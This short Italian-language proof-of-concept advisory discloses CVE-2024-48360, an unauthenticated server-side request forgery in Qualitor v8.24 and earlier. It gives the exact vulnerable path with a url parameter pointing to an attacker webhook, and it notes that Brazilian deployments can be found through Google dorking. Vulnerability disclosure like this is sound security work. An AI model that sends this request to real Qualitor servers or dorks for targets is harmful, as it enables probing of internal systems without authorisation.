
CVE-2024-48360 Poc
CVE-2024-48360 | Qualitor <= v8.24 SSRF non autenticato
Qualitor è una piattaforma per la gestione dei processi aziendali, e questo sistema è presente in varie aziende in Brasile che possono essere identificate semplicemente utilizzando Google dorking.
Il nostro team ha identificato una vulnerabilità nell'applicazione suscettibile a SSRF, che consente di enumerare sistemi/porte interni.
È stato scoperto che Qualitor v8.24 contiene una Server-Side Request Forgery (SSRF) tramite il componente /request/viewValidacao.php.
Per sfruttarla, è sufficiente inviare una richiesta a host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK; riceverai la richiesta dal server vulnerabile.

https://www.linkedin.com/in/xvinicius/